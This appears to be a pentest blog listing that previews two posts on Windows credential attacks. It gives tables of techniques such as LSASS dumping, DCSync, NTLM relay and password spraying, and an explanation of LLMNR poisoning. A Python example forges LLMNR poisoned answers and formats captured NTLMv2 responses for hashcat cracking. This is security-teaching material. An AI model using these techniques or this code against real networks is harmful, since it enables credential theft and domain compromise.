Credential Attacks — From Windows

Quick Reference

| Attack | Tool | Privilege Required |
|---|---|---|
| LSASS dump (live) | Mimikatz | Local Admin + SeDebugPrivilege |
| LSASS dump (ProcDump) | ProcDump / comsvcs.dll | Local Admin |
| DCSync | Mimikatz lsadump::dcsync | Domain Admin (or replication rights) |
| Local SAM | reg save + secretsdump | Local Admin |
| LSA Secrets | Mimikatz lsadump::lsa | SYSTEM |
| Cached domain creds | Mimikatz lsadump::cache | SYSTEM |
| GPP passwords | PowerSploit Get-GPPPassword | Domain User (SYSVOL read) |
| DPAPI triage | SharpDPAPI | Local Admin (domain backup key needs DA) |
| WDigest cleartext | Mimikatz sekurlsa::wdigest | Local Admin + WDigest enabled |
| Skeleton key | Mimikatz misc::skeleton | Domain Admin (DC access) |
| SSP injection | Mimikatz misc::memssp | SYSTEM on DC |
| Password spray | DomainPasswordSpray / Rubeus | Domain User |
| PPL bypass | mimidrv.sys kernel driver | SYSTEM + vulnerable driver |

Mimikatz — Core Commands

Mimikatz is the primary credential extraction tool for Windows. Most operations require SeDebugPrivilege at minimum, and many require SYSTEM. ...

14 min · MrAzoth

Credential Attacks & Relay — From Kali

Quick Reference

| Technique | Tool | Prerequisite | Output |
|---|---|---|---|
| LLMNR/NBT-NS Poisoning | Responder | Network access (capture works regardless of SMB signing) | NTLMv1/v2 challenge-responses (Net-NTLM hashes) |
| SMB Relay | ntlmrelayx.py | SMB signing not required on target | SAM dump / shell |
| LDAP Relay | ntlmrelayx.py | LDAP on DC reachable, signing not enforced | Computer accounts / RBCD |
| IPv6 Poisoning | mitm6 + ntlmrelayx | IPv6 not disabled on network (Windows default) | LDAP relay → DA |
| Coercion + Relay | PetitPotam / printerbug | Auth path to coerced machine | NTLM relay or TGT |
| DCSync | secretsdump.py | Domain Admin or replication rights | All NTLM hashes + AES keys |
| LSASS Dump | lsassy | Local admin on target | Plaintext / hashes |
| GPP Passwords | nxc -M gpp_password | Domain user | Cleartext credential |
| Password Spraying | nxc smb/ldap | Valid username list | Valid credentials |

LLMNR/NBT-NS Poisoning with Responder

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name resolution protocols that Windows uses when DNS fails to resolve a name. The host multicasts an LLMNR query (UDP 5355) and broadcasts an NBT-NS query (UDP 137) to the local subnet, and it accepts the first answer it receives. Responder answers these queries with the attacker's IP, so the victim connects to the attacker (for example over SMB) and authenticates with NTLM; Responder records the NTLMv1 or NTLMv2 challenge-response (the Net-NTLM hash), which can then be cracked offline or relayed to hosts that do not require signing. ...
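The two halves of the poisoning flow described above, as an added example that is not part of the original post or of Responder: building and parsing an LLMNR query, answering it with the attacker's address, and then turning a captured NTLM CHALLENGE/AUTHENTICATE pair into the hashcat -m 5600 line a poisoner would write out. All names and addresses (`fileserver01`, `192.168.1.50`, `alice`, `CORP`, `WS01`), the NTLM messages and the TTL of 30 are constructed for this example; the NTLM sample messages are built by the script itself so that it runs offline.

```python
import struct

# Constructed values for this example (not from the original post)
ATTACKER_IP = "192.168.1.50"                     # hypothetical poisoner address
LLMNR_PORT, LLMNR_MCAST = 5355, "224.0.0.252"    # RFC 4795 constants, shown for reference


def build_llmnr_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Build an LLMNR query as a Windows host sends it (DNS wire format, RFC 4795)."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, qd, an, ns, ar
    return header + qname + struct.pack(">HH", qtype, 1)    # qtype, class IN


def parse_llmnr_query(pkt: bytes):
    """Return (txid, name, qtype, raw question section) from an LLMNR query."""
    txid, flags, qdcount = struct.unpack_from(">HHH", pkt, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    pos, labels = 12, []
    while pkt[pos] != 0:                                    # walk length-prefixed labels
        n = pkt[pos]
        labels.append(pkt[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    pos += 1                                                # skip the root label
    qtype, _qclass = struct.unpack_from(">HH", pkt, pos)
    return txid, ".".join(labels), qtype, pkt[12:pos + 4]


def build_poisoned_answer(query: bytes, ip: str = ATTACKER_IP, ttl: int = 30):
    """Answer an A query with the attacker's address, as a poisoner does; None for other types."""
    txid, _name, qtype, question = parse_llmnr_query(query)
    if qtype != 1:
        return None
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, 1 question, 1 answer
    rdata = bytes(int(o) for o in ip.split("."))
    # answer RR: copy of the qname, type A, class IN, TTL, rdlength, rdata
    answer = question[:-4] + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def _ntlm_field(msg: bytes, off: int) -> bytes:
    """Read an NTLMSSP (Len, MaxLen, Offset) descriptor and return the payload it points to."""
    ln, _mx, o = struct.unpack_from("<HHI", msg, off)
    return msg[o:o + ln]


def ntlmv2_hashcat_line(type2: bytes, type3: bytes) -> str:
    """Combine a CHALLENGE (type 2) and AUTHENTICATE (type 3) message into hashcat -m 5600 format."""
    for msg, kind in ((type2, 2), (type3, 3)):
        if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != kind:
            raise ValueError(f"not an NTLMSSP type {kind} message")
    server_challenge = type2[24:32]                         # ServerChallenge field of type 2
    nt_resp = _ntlm_field(type3, 20)                        # NtChallengeResponse of type 3
    flags = struct.unpack_from("<I", type3, 60)[0]
    enc = "utf-16-le" if flags & 0x1 else "latin-1"         # NTLMSSP_NEGOTIATE_UNICODE
    domain = _ntlm_field(type3, 28).decode(enc)
    user = _ntlm_field(type3, 36).decode(enc)
    if len(nt_resp) <= 24:
        raise ValueError("24-byte NT response is NTLMv1: use hashcat -m 5500, not 5600")
    proof, blob = nt_resp[:16], nt_resp[16:]                # NTProofStr + client blob
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def sample_type2(challenge: bytes) -> bytes:
    """Constructed minimal CHALLENGE_MESSAGE: empty TargetName/TargetInfo, challenge at offset 24."""
    return (b"NTLMSSP\x00" + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", 0x00088201) + challenge + b"\x00" * 8 + struct.pack("<HHI", 0, 0, 48))


def sample_type3(user: str, domain: str, workstation: str, nt_resp: bytes) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE: 64-byte header (no Version/MIC), UTF-16LE strings."""
    u = lambda s: s.encode("utf-16-le")
    fields = [b"\x00" * 24, nt_resp, u(domain), u(user), u(workstation), b""]   # header order
    hdr, payload, off = b"NTLMSSP\x00" + struct.pack("<I", 3), b"", 64
    for f in fields:
        hdr += struct.pack("<HHI", len(f), len(f), off)
        payload += f
        off += len(f)
    return hdr + struct.pack("<I", 0x00088201) + payload    # flags include NEGOTIATE_UNICODE


if __name__ == "__main__":
    q = build_llmnr_query(0x1234, "fileserver01")           # constructed victim query
    print("poisoned LLMNR answer:", build_poisoned_answer(q).hex())
    chal = bytes.fromhex("41" * 8)                          # constructed server challenge
    nt_resp = bytes.fromhex("11" * 16) + bytes.fromhex("0101000000000000") + b"\x33" * 8 + b"\x00" * 8
    print(ntlmv2_hashcat_line(sample_type2(chal), sample_type3("alice", "CORP", "WS01", nt_resp)))
```

The NTLMv1 check matters in practice: a 24-byte NT response means the client was allowed to fall back to NTLMv1, which is a different hashcat mode and a much weaker target.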

17 min · MrAzoth